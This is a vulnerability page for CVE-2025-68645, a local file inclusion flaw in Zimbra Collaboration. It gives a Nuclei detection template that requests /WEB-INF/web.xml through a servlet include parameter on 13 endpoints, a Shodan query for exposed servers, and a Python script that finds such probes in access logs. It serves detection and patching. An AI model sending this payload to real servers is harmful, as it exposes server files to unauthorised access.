Zimbra Collaboration - Local File Inclusion
CVE-2025-68645
Verified
Description
Zimbra Collaboration (ZCS) 10.0 and 10.1 contain a local file inclusion vulnerability caused by improper handling of user-supplied parameters in the RestFilter servlet. It lets unauthenticated remote attackers include arbitrary files from the WebRoot; exploitation requires crafted requests to the /h/rest endpoint.
Severity
High
Published Date
December 30, 2025
Template Author
dhiyaneshdk, sirifu4k1
CVE-2025-68645.yaml
id: CVE-2025-68645

info:
  name: Zimbra Collaboration - Local File Inclusion
  author: DhiyaneshDk,sirifu4k1
  severity: high
  description: |
    Zimbra Collaboration (ZCS) 10.0 and 10.1 contain a local file inclusion caused by improper handling of user-supplied parameters in the RestFilter servlet, letting unauthenticated remote attackers include arbitrary files from WebRoot, exploit requires crafted requests to /h/rest endpoint.
  impact: |
    Unauthenticated remote attackers can include arbitrary files from the WebRoot directory, potentially exposing sensitive information.
  remediation: |
    Update to the latest version of Zimbra Collaboration.
  reference:
    - https://x.com/sirifu4k1/status/2006031417088639064
    - https://x.com/sirifu4k1/status/2007279822050078906?s=12&t=ovaWmJElNlGyzadE74ZOgQ
    - https://nvd.nist.gov/vuln/detail/CVE-2025-68645
  metadata:
    max-request: 13
    verified: true
    shodan-query: http.title:"Zimbra Collaboration Suite"
  tags: cve,cve2025,zimbra,zcs,lfi,vkev,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{path}}?javax.servlet.include.servlet_path=/WEB-INF/web.xml"

    payloads:
      path:
        - "h/rest"
        - "h/changepass"
        - "h/imessage"
        - "h/postLoginRedirect"
        - "h/printcalls"
        - "h/printcalendar"
        - "h/printvoicemails"
        - "h/printappointments"
        - "h/printcontacts"
        - "h/printconversations"
        - "h/printmessage"
        - "h/printtasks"
        - "h/viewimages"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?xml version"
          - "web-app>"
          - "Zimbra"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cc3a8833a17a3a880a448978095712dc5a1fb7c118660cfc092c22e9e332db9c02205e15ac9b15d8f2c7b535f974ea64c501e88b86917ac5f696bcb6f14635630b1d:922c64590222798bb761d5b6d8e72950
Remediation Steps
Update to the latest version of Zimbra Collaboration.
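The template above probes the /h/ servlets with a query string carrying the javax.servlet.include.servlet_path attribute name, which no legitimate client sends. Defenders who cannot patch immediately can look for the same signature in web-server access logs. The following Python script is an added example, not part of the Nuclei template or the Zimbra project: it parses Apache combined-format lines (an assumed log format), flags any request whose query string carries that attribute, records which file the request tried to include and whether the server answered 200 (the template's own success criterion), and marks whether the path is one of the servlets listed in the template. The log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Servlet paths taken from the template's payload list above.
AFFECTED_PATHS = {
    "/h/rest", "/h/changepass", "/h/imessage", "/h/postLoginRedirect",
    "/h/printcalls", "/h/printcalendar", "/h/printvoicemails",
    "/h/printappointments", "/h/printcontacts", "/h/printconversations",
    "/h/printmessage", "/h/printtasks", "/h/viewimages",
}

# Request attribute name used in the template's request; it is a server-side
# servlet attribute and should never appear in a client-supplied query string.
INCLUDE_PARAM = "javax.servlet.include.servlet_path"

# Apache combined-format access log (assumed format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a finding for a request matching the CVE-2025-68645 pattern, else None."""
    parts = urlsplit(entry["target"])
    # parse_qs percent-decodes both keys and values, so encoded variants of the
    # attribute name or of the included path are normalised before comparison.
    params = parse_qs(parts.query, keep_blank_values=True)
    if INCLUDE_PARAM not in params:
        return None
    status = int(entry["status"])
    return {
        "ip": entry["ip"],
        "timestamp": entry["ts"],
        "path": parts.path,
        "included": params[INCLUDE_PARAM][0],
        "status": status,
        # Paths outside the template's list are still reported: the attribute
        # itself is the signal, the servlet name only adds context.
        "known_servlet": parts.path in AFFECTED_PATHS,
        # The template treats HTTP 200 as the success condition.
        "likely_success": status == 200,
    }


def scan(lines):
    """Scan access log lines and return a list of findings in log order."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # skip lines that are not in the expected format
        finding = classify(entry)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample log lines: two probes (one served, one rejected),
# one ordinary /h/rest request, one unrelated SOAP call, one malformed line.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Dec/2025:10:15:01 +0000] '
    '"GET /h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml HTTP/1.1" 200 4821',
    '203.0.113.5 - - [30/Dec/2025:10:15:03 +0000] '
    '"GET /h/printcontacts?javax.servlet.include.servlet_path=%2FWEB-INF%2Fweb.xml HTTP/1.1" 404 512',
    '198.51.100.7 - - [30/Dec/2025:10:16:40 +0000] "GET /h/rest?fmt=json HTTP/1.1" 200 310',
    '198.51.100.7 - - [30/Dec/2025:10:16:41 +0000] "POST /service/soap HTTP/1.1" 200 1200',
    'not an access log line',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['ip']} {f['path']} -> {f['included']} "
              f"status={f['status']} served={f['likely_success']}")
```

Run it against a real access log with `scan(open(path))`; a finding with `likely_success` set is a request the server answered with 200 and should be triaged as a probable disclosure of the named file, while 4xx findings still identify the scanning source.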